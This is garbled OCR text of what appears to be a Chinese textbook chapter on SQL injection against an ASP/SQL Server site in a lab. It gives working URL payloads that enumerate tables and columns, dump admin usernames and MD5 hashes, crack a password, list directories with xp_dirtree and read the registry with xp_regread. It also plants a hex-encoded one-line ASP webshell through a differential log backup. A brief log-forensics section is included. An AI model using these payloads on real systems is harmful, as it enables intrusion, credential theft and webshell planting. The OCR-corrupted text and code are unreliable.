Microsoft OLE DB Provider for SQL Server (Ox80040E07) 

将 nvarchar 值 “dingdan ”转换 为 数据 类 型 为 int 的 列 时 发 生 语 
法 错误 。 

flookners.asp, 第 41 行 


错误 类 型 : 

Microsoft OLE DB Provider for SQL Server (Dx80040E07) 
es 值 “pinglun” 转换 为 数据 类 型 为 int 的 列 时 发 生 语 
法 错误 。 

f1ookners.asp, 第 41 行 


错误 类 型 ; 

Microsoft OLE DB Provider for SQL Server (0x80040E07) 

将 nvarchar 值 “news” 转 换 为 数据 类 型 为 int 的 列 时 发 生 语法 错 
误 。 

Joeoknews- asp， 第 41 行 


错误 类 型 : 

Microsoft OLE DB Provider for SQL Server (0x80040E07) 

将 nvarchar 值 ，“fanlmi” 转换 为 数据 类 型 为 int 的 列 时 发 生 语法 
错误 。 

flooknews.asp,， 第 41 行 

错误 类 型 : 

Microsoft OLE DB Provider for SQL Server (Dx80040E07) 

将 var cher 值 “shangepin” 转换 为 数据 类 型 为 int 的 列 时 发 生 语 
法 错误 。 

门 eoknews. asp， 第 41 行 

错误 类 型 : 

Microsoft OLE DB Provider for SQL Server (Dx80040E07) 

将 nvarchar 值 gonggao” 转换 为 数据 类 型 为 int 的 列 时 发 生 语 
法 错误 。 

flookners.asp, 第 41 行 

错误 类 型 : 

Microsoft OLE DB Provider for SQL Server (Dx80040E07) 

将 nvarchar 值 “liuyan” 转换 为 数据 类 型 为 int 的 列 时 发 生 语 法 
漠 误 。 

flookners.asp, 第 41 行 

错误 类 型 : 

Microsoft OLE DB Provider for SQL Server (Dx80040E07) 

将 nvarchar 值 dtproperties” 转 换 为 数据 类 型 为 int 的 列 时 发 
生 语法 错误 。 

flooknews.asp, 第 41 行 


图 4-14 依次 获得 每 个 用 户 表 的 名 称 


错误 类 型 : 

Microsoft OLE DB Provider for SQL Server (Dx80040E07) 

将 varchar 值 “|565577053| 转换 为 数据 类 型 为 int 的 列 时 发 生 
语法 错误 。 

flookners.asp, 第 41 行 


图 4-15 admin 表 的 id 号 为 565577053 
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http://192. 168. 0 3/1ooknews. asp? id= 20 and (select Top 1 cast name as 
nvarchar (4000))% 2Bchar (124 from (Select Top 1 colid, name from syscolums Where 
id 565577053 Order by colid) T Order by colid desc)> 0;-—— 


图 4-16 显示 admin 表 第 一 个 字段 名 为 username。 


。 错误 类 型 : 
Microsoft OLE DB Provider for SQL Server (Dx80040E07) 
将 nvarchar 值 “username|” 转换 为 数据 类 型 为 int 的 列 时 发 生 
语法 错误 。 
flookners.asp, 第 41 行 


图 4-16 第 一 个 字段 名 为 username 


变换 子 查询 中 的 n 值 ,可 以 依次 获得 每 个 字段 的 名 称 。 


http://192 168. 0 3/1ooknews. asp? id= 20 and (select Top 1 cast name as 
nvarchar (4000))% 2Bchar (124 from (Select Top n colid name from syscolums Where 
id= 565577053 Order by colid) T Order by colid desc)> 0;-— 


图 4-17 是 依次 获得 每 个 字段 的 名 称 。 


。 错误 类 型 ; 
Mierosoft OLE DB Provider for SQL Server (Dx80040E0T) 
te 值 “pass| 转换 为 数据 类 型 为 int 的 列 时 发 生 语法 
误 。 
flooknews.asp, 第 41 行 


。 错误 类 型 ; 
Microsoft OLE DB Provider for SQL Server (0x80040E07) 
将 nvarchar 值 “vip|” 转 换 为 数据 类 型 为 int 的 列 时 发 生 语法 错 
证， 
flooknews.asp, 第 41 行 


。 错误 类 型 : 
Microsoft OLE DB Provider for SQL Server (Dx80040E07) 
将 nvarchar 值 “id| 转换 为 数据 类 型 为 int 的 列 时 发 生 语法 错 
误 。 
门 ooknews- asp,， 第 41 行 


。 错误 类 型 ; 
Microsoft OLE DB Provider for SQL Server (Dx80040E07) 
将 nvarchar 值 “mail| ”转换 为 数据 类 型 为 int 的 列 时 发 生 语法 
漠 误 。 
门 ooknews. asp， 第 41 行 


。 错误 类 型 : 
Microsoft OLE DB Provider for SQL Server (Dx80040F07) 
将 nvarchar 值 “xinanins| ”转换 为 数据 类 型 为 int 的 列 时 发 生 
语法 错误 。 
门 ooknews- asp， 第 41 行 


。 错误 类 型 : 
Microsoft OLE DB Provider for SQL Server (0x80040E07) 
将 nvarchar 值 'tel|” 转换 为 数据 类 型 为 int 的 列 时 发 生 语 法 错 
误 。 

flookners.asp, 第 41 行 


。 错误 类 型 
Microsoft OLE DB Provider for SQL Server (0x80040E07) 
将 nvarchar 值 “dizhi | 转换 为 数据 类 型 为 int 的 列 时 发 生 语法 
错误 。 
门 ooknews- asp， 第 41 行 


图 4-17 依次 获得 每 个 字段 的 名 称 
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10. 判断 admin 表 的 记录 个 数 
下 面 语 句 可 以 获得 admin 表 的 记录 个 数 : 


http://192. 168. 0 3/Iooknews. asp? id 20 and (select char (124)% 2BCast (Count (sername) as nvarchar (4000))% 2Bchar 
(124) from admin)> 0;-—— 


图 4-18 显示 admin 表 包 含 3 条 记录 。 


。 错误 类 型 : 
Microsoft OLE DB Provider for SQL Server (Ox80040E07) 
将 nvarchar 值 “13| 转换 为 数据 类 型 为 int 的 列 时 发 生 语法 错 
误 。 SE 

flooknews.asp,， 第 41 行 


图 4-18 admin 表 包 含 3 条 记录 


11. 获得 admin 表 的 字段 值 
下 面 语句 可 以 获得 admin 表 的 字段 值 ,这 里 只 提取 username 和 pass 两 个 字段 信息 : 


http://192. 168. 0. 3/1ooknews. asp? id 20 and (select Top 1 isNul| (char (124)% 2Bcast (username as nvarchar (4000))% 
2Bchar (124 , char (32)) from (Select Top 1 username, pass from shop..admin Order by username) T Order by username 
Desc)> 0;-- 


图 4-19 显示 第 一 个 用 户 名 “111”。 


。 错误 类 型 ; 
Microsoft OLE DB Provider for SQL Server (Dx80040E07) 
pele 值 “|1111| ”转换 为 数据 类 型 为 int 的 列 时 发 生 语法 
错误 。 


人 1ookners.asp, 第 41 行 


图 4-19 第 一 个 用 户 名 “111” 


变换 n 值 依次 获得 每 对 账户 信息 。 


http://192. 168. 0 3/1ooknews. asp? id= 20 and (select Top 1 isNull (char (124)% 2Bcast (pass as nvarchar (4000))% 
2Bchar (124 , char (32)) from (Select Top n username, pass from shop..admin Order by username) T Order by username 
Desc)> 0;-- 


图 4-20 显示 依次 获得 的 每 对 账户 信息 。 


12 破解 md5 密码 

上 面 共 获 得 了 三 个 账户 信息 : mr d7b0a59bada06adl 、user ee4lle2d89e7c073、1ll 
9d8al21ce581499d, 通 过 再 线 md5 破解 网 站 可 以 获得 密码 明文 。 如 图 4-21 所 示 ,lll 的 密 
码 为 111。 


13. 登录 网 站 后 台 
使 用 破解 出 的 管理 员 账 户 信息 登录 后 台 , 以 管理 员 身份 维护 网 站 ,如 图 4-22 和 图 4-23 
所 示 。 上 有 具体 步骤 略 。 
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。 错误 类 型 : 
Microsoft OLE DB Provider for SQL Server (Dx80040E07) 
将 nvarchar 值 “|9d8al21ce5814994| ”转换 为 数据 类 型 为 int 的 
列 时 发 生 语法 错误 。 
Jooknews. asp， 第 41 行 


。 错误 类 型 ; 
Microsoft OLE DB Provider for SQL Server (0x80040E07) 
将 nvarchar 值 ”|mr| 转换 为 数据 类 型 为 int 的 列 时 发 生 语法 错 
误 。 


flooknews.asp, 第 41 行 


。 错误 类 型 : 
Microsoft OLE DB Provider for SQL Server (0x80040E07) 
将 nvarchar 值 “|d7b0a59badan6adl | ”转换 为 数据 类 型 为 int 的 
flooknews.asp, 第 41 行 

。 错误 类 型 : 
Microsoft OLE DB Provider for SQL Server (Ox80040E07) 
ee 值 “ |user |” 转 换 为 数据 类 型 为 int 的 列 时 发 生 语 法 
LL 第 41 行 


。 错误 类 型 : 
Wi erosoft OLE DB Provider for SQL Server (Dx80040E07) 
将 nvarchar 值 “|ee411e2d89e7c073|” 转换 为 数据 类 型 为 int 的 
列 时 发 生 语 法 错误 。 
flooknews.asp, 第 41 行 


图 4-20 依次 获得 每 对 账户 信息 


全 浏览 器 4.1 正式 版 文件 日 ”查看 


夏 v | 做 无 辣 " | | 路 http//www.cmd5.com w 加 
网 址 大 全 网游 戏 中 心 日 ij 功能 才 win7 技 @http_w 国光 6 国 购 团 辽 宁 人 事 加 深入 研究 


9d8a121ce581499d 
md5 


查询 结果 : 
111 


4-21 在 线 破解 密码 
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图 4-22 后 台 登 录 界 面 
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4-23 登录 成 功 界 面 
”4.3 读 取 网 站 主 目录 位 置 


431 利用 部 dirtree 存储 过 程 获得 网 站 的 主 目录 


xp_dirtree 存储 过 程 使 用 权限 很 低 ,Public 用 户 即 可 使 用 ,因此 利用 这 种 方法 获取 网 


站 主 目录 效果 很 好 。 通 过 下 面 语句 可 在 服务 器 端 数据 库 建立 一 个 dirs 数据 表 .“http:// 
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192. 168. 0. 3/lookpro. asp? id= 50; DROP TABLE dirs;CREATE TABLE dirs (paths 
nvarchar(400) NULL ,depth tinyint NULL,type bit NULL);--”, 先 执行 DROP 命令 删 
除 可 能 存在 的 dirs 数据 表 , 然 后 使 用 CREATE 命令 新 建 dirs 数据 表 。 其 中 ,paths 保存 
文件 或 文件 夹 名 称 ;depth 保存 层次 ;type 区 分 文件 和 文件 来。 图 4-24 为 在 服务 器 端 建 
立 的 dirs 数据 表 。 


四 本 到 
9 关系 图 国 atproperties dbo 系统 
表 fankui dbo 用 户 
6 视图 国 somggao dbo 用 户 


图 4-24 在 服务 器 端 建立 的 dirs 数据 表 


下 面 语句 调用 xp_dirtree 存储 过 程 将 EE:\ 根 目录 下 的 文件 .文件 夹 名 称 插入 dirs 数 
据 表 。“ http://192. 168. 0. 3/lookpro. asp? id 一 50; DELETE dirs; Insert dirs exec 
master..xp_dirtree 'e:\',1,1;--”, 先 使 用 DELETE 命令 删除 dirs 表 中 的 所 有 数据 ,再 使 
用 Insert 命令 将 下 以 根 目录 下 的 信息 插入 dirs 表 ,xp_dirtree 存储 过 程 共 三 个 参数 ,第 一 
个 参数 是 读 取 的 路 径 ;第 二 个 参数 是 读 取 
深度 ,本 例 为 1 表示 只 读 取 1 层 信息 ;第 三 
个 参数 是 文件 类 型 , 1 为 文件 夹 和 文件 ， 
0 为 只 显示 文件 夹 。 图 4-25 所 示 为 在 服务 
器 端 dirs 数据 表 的 截图 。Type 为 0 表示 图 4-25 服务 器 端 dirs 数据 表 的 截图 
文件 夹 为 1 表示 文件 。 

下 面 语句 读 出 眉 盘 根 目录 下 的 信息 : 

http://192. 168. 0. 3/1ookpro. asp? id 50 and (select Top 1 cast (paths as nvarchar (400)) from (select top n paths, 

type from dirs ORDER BY type, paths) T ORDER BY type desc, paths desc)= 0;-— 


n 的 值 依次 为 1,2,3,4,…', 可 依次 读 出 王 盘 根 目录 下 的 所 有 信息 。 图 4-26 所 示 是 获 
得 的 信息 ,可 见 正 盘 根 目 录 下 有 aaa 和 System Volume Information 两 个 文件 夹 , 一 个 文 
件 hello. txt。 接 下 来 进入 aaa 文件 夹 查看 。 


错误 类 型 ; 


Microsoft OLE DB Provider for SQL Server (Dx80040E07) 
将 nvarchar 值 aaa” 转 换 为 数据 类 型 为 int 的 列 时 发 生 语法 错 


mm 表 “dirs” 中 的 数据 ， 位 置 是 “shop” 中 、“(local)” 上 


误 。 
flookpro. asp， 第 51 行 


。 错误 类 型 : 
Microsoft OLE DB Provider for SQL Server (Dx80040E07) 
将 nvarchar 值 “System Yolume Information” 转 换 为 数据 类 型 为 
int 的 列 时 发 生 语法 错误 。 
flookpro. asp， 第 51 


错误 类 型 : 

Microsoft OLE DB Provider for SQL Server (0x80040F07) 

将 nvarchar 值 “hello. txt” 转换 为 数据 类 型 为 int 的 列 时 发 生 
语法 错误 。 

门 ookpro- asp， 第 51 行 


图 4-26 得 到 下 盘 下 信息 
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下 面 语句 读 出 E:\aaa 下 的 目录 信息 : 

http://192 168. 0. 3/1ookpro. asp? id= 50;DELETE dirs; Insert dirs exec master. .xp_dirtree 'e:\aaa ,1,1;-— 

首先 删除 dirs 表 之 前 的 内 容 , 之 后 向 dirs 表 插 入 E:\aaa 下 的 目录 信息 。 图 4-27 为 
服务 器 端 dirs 数据 表 的 截图 。 

同样 使 用 下 面 语句 可 以 依次 读 出 e:\aaa 文件 夹 下 的 所 有 信息 


http://192 168. 0 3/|ookpro. asp? id 50 and (select Top 1 cast (paths as nvarchar (400)) from (select top n paths, 
type from dirs ORDER BY type, paths) T ORDER BY type desc, paths desc)= 0;-— 
图 4-28 为 部 分 结果 的 截图 。 通 过 这 些 信息 可 以 确定 EE:\aaa 为 网 站 主 目录 。 

。 错误 类 型 ; 


Microsoft OLE DB Provider for SQL Server (Dx80040E0T) 
将 nvarchar 值 “adnin 转换 为 数据 类 型 为 int 的 列 时 发 生 语法 
i 


in 表 “dirs” 中 的 数据 ， 位 置 是 “shop” 中 、“ 错误 
[as [ap lu | ea 


center, asp 


错误 类 型 : 

Microsoft OLE DB Provider for SQL Server (Dx80040E07) 

将 nvarchar 值 “database” 转换 为 数据 类 型 为 int 的 列 时 发 生 语 
法 错误 。 

flookpro.asp, 第 51 行 


0 
1 
chaxun. asp 1 
chk_user. asp 1 
class. asp 1 
commend. asp 1 
database 0 
foot asp 1 
ouwu asp 1 
hot asp 1 
idea asp 1 


错误 类 型 : 

Microsoft OLE DB Provider for SQL Server (Dx80040E07) 

将 nvarchar 值 “chaxun. asp” 转 换 为 数据 类 型 为 int 的 列 时 发 生 
语法 错误 。 

门 ookproe- asp， 第 51 行 


图 4-27 服务 器 端 dirs 数据 表 的 截图 图 4-28 获得 e:Naaa 文件 夹 下 的 信息 


432 利用 xp_regread 存储 过 程 读 取 网 站 主 目录 位 置 


前 面 介绍 的 利用 xp_dirtree 存储 过 程 获得 网 站 主 目录 的 方法 优点 是 对 权限 要 求 低 ， 
因而 通用 性 强 , 但 是 定位 主 目录 的 过 程 比较 烦琐 ,下 面 介绍 xp_regread 存储 过 程 读 取 网 
站 主 目录 位 置 的 方法 ,这 种 方法 可 以 快速 定位 网 站 主 目 录 位 置 。 网 站 的 主 目录 存储 位 置 
保存 在 注册 表 'HKEY_LOCAL_MACHINE','SYSTEMAN ControlSet001 \ Services \ 
W3SVC\Parameters\Virtual Roots'",/', 如 图 4-29 所 示 。 通 过 读 取 注 册 表 信息 可 以 快速 
定位 主 目录 存储 位 置 。 


文件 外 蝙 辑 双 ) 查看 收藏 天 由 帮助 00 


数据 

发 值 未 设置 ) 

了 Evaaa ,213 

Eindons\help\iishelp,, 
国 /Printers C: MWINDOWS\web\printers, ,201 


: Bal 
我 的 电脑 \HKEY_LDCAL_MACHINE\SYSTEN\ControlSet001\Services\W3SYC\Paraneters\Virtual Roots 


图 4-29 注册 表 中 保存 网 站 主 目录 位 置 


Ga ac 
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下 面 语 句 在 shop 数据 库 中 建立 一 个 名 为 regtmp 的 数据 表 , 该 表 用 于 保存 读 取 的 注 
册 表 信息 ,value 字段 保存 键 值 名称 ,data 字段 保存 键 值 内 容 。 


http://192 168. 0 3/lookpro. asp? id= 50;DROP TABLE regtmp;CREATE TABLE regtmp (value nvarchar (4000) NULL data 

nvarchar (4000) NULD :- 一 

下 面 语句 用 于 读 取 注册 表 键 值 . 首 先 使 用 delete 命令 清空 regtmp 表 的 内 容 , 然 后 使 
用 xp_regread 存储 过 程 从 注册 表 中 读 取 网 站 主 目录 的 位 置 并 插入 到 regtmp 数据 表 中 。 


http://192. 168. 0 3/1ookpro. asp? id= 50; DELETE regtmp; Insert regtmp exec master. dbo. xp_regread ' HKEY_LOCAL_ 
MACHINE , * SYSTEM\ ControlSetO01\ Services\W3SVC\ Parameters\Virtual Roots ，/ ;—— 


regtmp 表 内 容 如 图 4-30 所 示 ,可见 主 目录 位 于 E:\aaa。 
下 面 语句 从 regtmp 表 中 读 出 网 站 的 主 目录 信息 ,在 将 字符 串 类 型 的 信息 与 整数 0 比 
较 时 出 错 , 返 回 的 错误 提示 中 就 包含 了 网 站 主 目录 位 置信 息 , 如 图 4-31 所 示 。 


http://192 168. 0. 3/1ookpro. asp? id= 50 and (Select Top 1 cast (data as nvarchar (4000)) from regtmp order by data 
desc)= 0 一 一 


|] | an: 


| va la | Microsoft DOLE DB Provider for SQL Server (Dx80040FE07) 

| 将 nvarchar 值 'E: \aaa, ,213， 转 换 为 数据 类 型 为 int 的 列 时 发 
生 语 法 错误 。 

fookpro.asp,， 第 51 行 


图 4-30 regtmp 表 中 插入 了 网 站 的 主 目录 位 置 ”图 4-31 通过 IE 错误 提示 获得 网 站 主 目录 位 置 


最 后 删除 regtmp 表 ,语句 如 下 : 


http://192. 168. 0. /lookpro. asp? iji 50;DROP TABLE regtmp;- 一 
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攻击 者 的 入 侵 痕 迹 可 能 会 遗留 在 数据 库 事务 日 志 、 操 作 日 志 、Web 日 志 、 操 作 系统 日 
志 等 处 ,下 面 依次 查看 。 


1. 查看 SQL Server 数据 库 的 事务 日 志 
图 4-32 是 在 服务 器 端 查看 到 的 2012-3-14 当天 的 SQL Server 事务 日 志 , 可 以 看 到 数 
据 库 的 启动 信息 ,但 没有 发 现 人 侵 痕 迹 。 


图 zol2-03-14 05:45:49.99 spid51 ”使 用 xpstar. 1” 版 本 “2000. 80. 2039” 来 执行 扩展 存储 过 程 “sp_... 
图 zol12-03-14 05:45:50.23 spid51 ”启动 数据 库 “msdb”。 

国 z012-03-14 05:46:00.15 spid51 ”启动 数据 库 “Northwind”。 

图 zol2-03-14 05:46:00.29 spid51 。 启动 数据 库 “pubs”。 

得 2012-03-14 05:46:13.27 spid51 ”启动 数据 库 “shop”。 


图 4-32” SQL Server 的 事务 日 志 


2. 查看 SQL Server 数据 库 的 操作 日 志 
在 SQL Server 数据 库 的 操作 日 志 中 记录 了 用 户 对 数据 表 的 创建 ,修改 、 删 除 等 行为 ， 
前 面 读 取 到 的 目录 信息 被 保存 在 dirs 数据 表 中 ,使 用 Log Explorer 查看 SQL Server 数 
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据 库 的 操作 日 志 可 以 还 原 dirs 表 的 创建 .修改 .删除 全 过 程 。 图 4-33 记录 的 是 向 dirs 数 
据 表 插 入 记录 的 日 志 , 可 以 查看 到 目录 数据 被 逐条 插入 dirs 数据 表 , 当前 选中 记录 表示 


2012-3-14 08:31:41. 217“index. asp 1 1” 被 插入 dirs 数据 表 。 


[TiTme [Transld DpCode Table Index [UID [SPID [Desc 外 
| 140894217 INSERT_ROWS dbo dis ds 52 InsenExec 
0314 08.31:41.217 INSERT_ROWS dbodis is 52 InseftExec 
0314 08.31:41.217 dbodis ds 52 InserlExec 
| 1408341217 dbo dis hs 52 InserlExec 
[03140831:41.217 INSERT_ROWS dbodis is 52 InsertExec 
的 14063141217 INSERT_ROWS dbo dis dis 52 InserlExec 
031408.31:41.217 INSERT_ROWS dbo dis is 52 InsertExec 
0314 08.31:41.217 INSERT_ROWS dbodis his 52 InserlExec 
914 08:41.217 INSERT_ROWS dbo dis his 52 InserlExec 
> 1 27 INSERT_ROWS dbo dr ois 52 InsertExec 
| 03140831:41.217 INSERT_ROWS dbo dis his 52 InsertExec 
031408.31:41.217 INSERT_ROWS dbo dis dis 52 InseftExec 
0314 06.31:41.217 INSERT_ROWS dbo dis dis 52 InserlExec | 
| 03140831:41.217 INSERT_ROWS dbo dis his 52 InsentExec 
0314 08.31:41.217 INSERT_ROWS dbo dis is 52 InserlExec 
914 0841.217 INSERT_ROWS dbo dis dis 52 InsertExec 
0314 08:31:41.217 INSERT ROWS dbo drs hs 52 InsentExec L 
NT User name NT Domain Chent Host Session Stan 
Coumn aa I T 
indexasp 
depth 1 
bpe 


图 4-33 向 dirs 数据 表 插 入 记录 的 日 志 


图 4-34 所 示 是 删除 dirs 数据 表 记 录 的 日 志 , 可 以 查看 到 目录 数据 被 逐条 删除 ,当前 
选中 记录 表示 2012-3-14 08:31:41. 230“admin 1 0” 被 删除 。 通 过 分 析 这 些 日 志 记 录 可 


以 发 现 攻击 者 读 取 目 录 数 据 的 行为 。 


Time Transld DpCode Tabe Ingex [UD [SPID TDesc 
-1408141.230 O00 DELETE_ROWS dbodis is dbo ”52DML 
W148.230 000000000ada “| DELETE_ROW5 dbo fis dis do 520ML 
W140841.230 000000000ada DELETE_AOWS dbo dis is dbo 520ML 

[| N42 10000000008da DELETE_ROWS dbo his ois do 到 DML 
[| nM.20 “10000000008da DELETE_ROWS dbo fis dis do 52OML 
| | 1408341230 O00000000ads DELETE_ROWS dbo dis is dbo 520ML 
1408341.230 000000000ada DELETE_AOWS bo dis is do DML 
03140831:41.230 O00GO0000ada | DELETE_ROWS dbo dis is bo 52DML 
[| Wn 10000000008da DELETE_AOWS dbo fis dis do ”本 DML 
[| Wm 10000000008da DELETE_ROWS dbo dis is do 520ML 
W144230 000000000ada DELETE_ROWS dbo fis dis doo 520ML 
了 914i41230 do dis his dbo 2 DML 
[| 2 dbodis is do 到 DML 
| | 03140831:41.230 dbo dis hs dbo 到 ML 
| | 314083141.230 dbo dis dis do | 2DML 
| | 03140831:41.230 dbo.dis ds dbo 5 DML 
NT User name Logn NT Domain Chient Host Session Stat 


图 4-34 从 dirs 表 逐 条 删除 记录 


通过 查看 用 户 调用 DDL 的 执行 过 程 也 可 以 发 现 一 些 线索 ,图 4-35 是 使 用 Log 
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Explorer 查看 到 的 DDL 的 执行 过 程 日 志 , 可 见 2012-3-14 08: 22: 53. 047 建立 了 dirs 数 
据 表 ,这 个 数据 表 的 唯一 ID 是 1669580986, 之 后 的 日 志 记 录 了 dirs 数据 表 被 删除 。 


CREATE TABLE [dbol [dirs] (paths] NVARO depth] TINYINT. ltype] BIT} 
DROP TABLE [dbo} [dis] 
CREATE TABLE [dbo] (dis] [paths] NYARCHARIB00L [depth] TINYINT type] BIT] 


看 四 ] 
Time Transld [OpCode [Table [NT User name UID [SPID [Dese 
0314 082253047 0000:00000ad] |INSERT_ROWS dbo sysoblects dbo |52 |dis 


三 LNTGzcb OBECTIDT 


图 4-35 查看 DDL 的 执行 过 程 日 志 


3. 查看 服务 器 端的 Web 日 志 

图 4-36 是 在 服务 器 端 查看 到 的 Web 日 志 , 从 中 可 见 攻 击 的 全 过 程 , 包 括 客 户 IP、 时 
间 ,链接 .SQL 命令 等 。Web 日 志 容 量 通常 很 大 ,可 以 通过 搜索 关键 字 的 方法 快速 定位 记 
录 , 如 DELETE .exec 等 。 


旨 ez120317 

文件 四 蝙 辑 也 ) 格式 0) 查看 上 帮助 0 

ssoftware: Microsoft Internet Information Services 5.1 

HNersion: 1.8 

HDate: 2912-693-17 01:41:27 

HFields: tine c-ip cs-nethod cs-uri-stem cs-uri-query sc-status cs(Cookie) 

01:41:27 192.168.8.2 GET /lookpro-asp id"=50;DROP%28TABLEX20dirs;CREATEX20TABLEX28dirs(paths®28nvarchar (480)% 
2 GET /lookpro-asp id"50;DELETE%20dirs;Insert%20dirs%20exec%20naster. .xp_dirtree%20' e:\ae 
2 GET /lookpro-asp id-50%20and%20(select%20Top%281%28cast(paths%20as%20nvarchar (400) )%20f 
2 GET /lookpro-asp id-56%28and%28(select%26Top%281%28cast(paths%20as%28nvarchar (400) )%20f 

192. 2 GET /lookpro-asp id=50%20and%28(select%20Top%281%28cast(paths%20as%28nuarchar (400) )%20f 
:42 192.168.0.2 GET /lookpro.asp id"50%20and20(selectt20Top%201%20cast(paths%20as%2Onvarchar (400) )%20¢ 


-2 GET /lookpro-asp id-50%20and%28(select%20Top%201%20cast(paths%20as%20nuarchar ( 490) )%20 

a 2 GET /lookpro-asp id-56%28and%28(select%28Top%281%28cast(paths%20as%20nuarchar (400) )%20¢ 

9.2 GET /lookpro-asp id-50%20and%20(select%28Top%201%29cast(paths%20as%20nvarchar (400) )%20¢ 
总 


> 


图 4-36 在 服务 器 端 查看 到 的 web 日 志 


4 ”利用 差异 备份 上 传 网 页 木马 


上 传 网 页 木马 首先 要 确定 网 站 的 注入 点 ,确定 主 目 录 的 位 置 ;然后 利用 SQL Server 数 
据 库 的 差异 备份 功能 在 主 目录 下 形成 “一 句 话 木马 ”, 如 aa. asp; 最 后 利用 这 个 aa. asp 修 
改 网 站 的 主页 index. asp 完成 挂 马 。 图 4-37 所 示 为 基于 “差异 备份 ”的 SQL 注入 挂 马 流程 。 


441 利用 SQL Server 数据 库 的 差异 备份 功能 在 服务 器 端 
形成 “一 旬 话 木马 ” 

下 面 语句 修改 数据 库 为 完全 备份 模式 ,为 后 面 进 行 差异 备份 作 准 备 。 

http://192 168.0 3/lookpro .asp? id= 50:alter database shop set REOOVERY FUL:-— 


利用 下 面 语句 在 服务 器 端 创建 tmpl 数据 表 . 该 表 用 于 保存 "一句 话 木马 ”的 源 代码 。 
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被 入 侵 站 点 


4 : 主 贝 ~----- 
一 -4. 浏 览 主页 ---， 


一 -6 下 载 、 运 行 木马 --- 上 web 服务器 


hacker 


图 4-37 基于 “差异 备份 "的 SQL 注入 挂 马 流程 


http://192 168. 0. 3/1ookpro. asp? id= 50:;create table tmpl (cmd image):;-— 


这 里 的 cmd 是 一 个 图 片 类 型 字段 ,其 中 保存 二 进 制 数 值 。 

下 面 语句 用 于 备份 shop 数据 库 的 日 志文 件 。 

http://192 168. 0 3/1ookpro. asp? id= 50; declare @ a sysname, @ s nvarchar (4000) select @ a= db_name (), @ s= 

0x730068006F007000 backup log @a to disk=@s with init,no_truncate;—— 

declare 语句 负责 声明 a 和 s 两 个 变量 。a 是 一 个 sysname 类 型 .用 于 保存 用 户 名 ， 
s 为 nvarchar(4000) 类 型 .用 于 保存 unicode 格式 的 数据 库 名 称 。@a 二 db_name() 将 当 
前 用 户 名 dbo 存 人 变量 a,0x730068006F007000 是 shop 的 unicode 编码 。 

下 面 语句 向 tmpl 表 插 入 “一 句 话 木 马 ” 源 代码 ,其 中 0x3C25657865637574652872- 
657175657374282261222929253E 是 二 %execute(request(”a”))% 二 的 十 六 进 制 表示 。 


http://192. 168. 0. 3/1ookpro. asp? id= 50; insert into tnp1 (cmd) 
values (0x3025657865637574652872657175657374282261222929253E) ;一 一 


图 4-38 所 示 是 在 服务 器 端 查 看 到 的 tmpl 表 内 容 。 


查询 一 XP. shop. sa 一 无 标题 1* 


Belect * from tmpl 


lemd 


他 @.0) jsa 61 jshop | 0:00:00 4 行 答 3, 列 1 


图 4-38 在 服务 器 端 查看 到 的 tmpl 表 内 容 


SQL Server 数据 库 的 差异 备份 功能 只 对 数据 库 从 上 次 备份 到 目前 这 段 时 间 内 的 变 
化 部 分 进行 备份 ,前 面 insert 命令 向 tmpl 表 插 入 “一 句 话 木马 ” 源 代码 的 操作 恰好 在 这 
段 时 间 内 ,因此 “一 句 话 木 马 ” 的 源 代码 会 被 备份 到 日 志文 件 中 。 在 进行 差异 备份 时 将 日 
志文 件 的 保存 位 置 指向 网 站 主 目录 e:\aaa, 将 日 志文 件 的 名 称 设 为 aa. asp。 这 样 一 来 
“一 旬 话 木马 ”aa. asp 就 成 功 地 保存 在 网 站 的 主 目录 下 。 

差异 备份 语句 为 : 

http://192 168. 0. 3/1ookpro. asp? id= 50: declare @ a sysname. @ s nvarchar (4000) select @ a= db_name (),@ s= 

0x65003A005C006100610061005C00610061002E00610073007000 backup log @a to disk=@s with init,no_truncate;-—— 
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其 中 ,0x65003A005C006100610061005C00610061002E00610073007000 是 “e;\aaa\ 
aa. asp” 的 unicode 格式 。 图 4-39 所 示 为 显示 在 服务 器 端 主 目录 下 出 现 了 aa. asp。 查 看 
aa. asp 的 内 容 会 看 到 在 乱码 数据 中 夹杂 了 “一 句 话 木马 ”的 源 代码 ,如 图 4-40 所 示 。 


文件 到 编辑 到 ) 查看 ) 收 章 和) 工具 上 帮助 0 
四 银 : 园 - 认 万国 隔 x 闻 天 国 - 


地 址 四) | 已:\sss 


文件 和 文件 夹 任务 
国 重合 名 这 个 文件 
了 范 移 动 这 个 文件 
[DD 复制 这 个 文件 


< 二? 漏 和 DML 
UE 示 - 说 @ 四 


a 
%execute(re' i Wt 


图 4-40 在 aa.asp 中 包含 7 了 “一句 话 木 马 ” 的 源 代码 


442 利用 “一 旬 话 木马 ”修改 网 站 主页 植 入 挂 马 代 码 


“一 句 话 木马 ?的 服务 端 就 是 aa. asp ,客户 端 由 一 组 网 页 组 成 ,如 图 4-41 所 示 。 每 个 
网 页 都 可 以 完成 一 个 功能 ,包括 查看 驱动 器 列表 、 查 看 文件 . 读 取 注 册 表 .上 传 文件 .下 载 
文件 、 修 改 文件 等 。 


文件 中) 编辑 至) 查看 WD 收 章 人 ) 工具 CD) 帮助 0 3 
合 用时 三 XH | 国 - 
| 团 # 到 


文件 和 文件 夹 任务 和 2 
2 


忆 时 一 个 新 文件 天 
站 将 这 人 文人 天 发 到 


局 共享 此 六 件 天 


DD lke2Evaclient 


加 用 
白 擦 X 
我 的 电 让 
邮 同居 


图 4-41 一 句 话 木马 的 客户 端 
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1. 测试 “一 旬 话 木马 ”的 连接 功能 

双击 one. htm 启动 “一 句 话 木马 ”客户 端 ,如 图 4-42 所 示 。 在 URL 中 输入 http:// 
192. 168. 0. 3/aa. asp,password 文本 框 输入 a, 单 击 Send 按钮 得 到 如 图 4-43 所 示 的 结果 
表示 “一 句 话 木马 ”工作 正常 。 


文件 @) 编辑 于) 查看 如 收藏 和 工具 0) 帮助 00 


Ga 日 - 国 回 的 Ps 次 wax 加 | 后- 及 国电 


地 址 吧 | 箭 |C:\one. htn 


Enjoy Hacking! | 


The RL: [tp /7/192 165.0 3/ae esp Password: EE 
Fanetion: [ABOUT “及 
加 
ED 如 我 的 电 及 


图 4-42 启动 一 句 话 木马 客户 端 


加 http://192. 168- 0. 3/aa- asp 一 icrosoft Internet Explorer 回回 | 
文件 @) ”编辑 下 ) 查看 人 收藏 ) 工具 CI) 帮助 0 


Ga -昌国 国 的 Per 六 ex 加 | 全 -有 国电 


地 址 加 ) | 件 http://192. 168.0.31aa asp 


Hello ，World ! 


图 4-43 测试 结果 


2. 得 到 服务 器 的 驱动 器 列表 

